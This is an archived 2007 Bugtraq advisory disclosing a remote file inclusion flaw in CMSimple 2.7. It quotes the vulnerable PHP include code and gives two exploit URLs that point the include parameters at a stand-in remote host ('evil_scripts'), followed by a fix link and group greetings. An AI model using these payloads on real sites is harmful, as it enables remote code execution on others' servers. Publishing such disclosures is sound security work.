cmsimple 2.7 Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: cmsimple 2.7 Remote File Include
From: "mr alkomandoz" <k3g@xxxxxxxxxxxxxx>
Date: Sun, 21 Jan 2007 05:29:07 +0800
Cc: str0ke@xxxxxxxxxxx
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-----------------------------------------------

cmsimple 2.7  Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

if (!@ include ($pth['file']['plugin_index']))
        


{if(@include($pth['file']['image']))exit;}




-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?


cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts?

-----------------------------------------------

download:  http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa


SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team


                 
##################################

AsB-MaY.NeT  & MoHaNdKo.CoM

##################################


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Prev by Date: SQL Injection in Unique Ads ( UDS )
Next by Date: Microsoft Visual C++ (.RC) resource files buffer overflow vulnerability
Previous by thread: SQL Injection in Unique Ads ( UDS )
Next by thread: Microsoft Visual C++ (.RC) resource files buffer overflow vulnerability
Index(es):
- Date
- Thread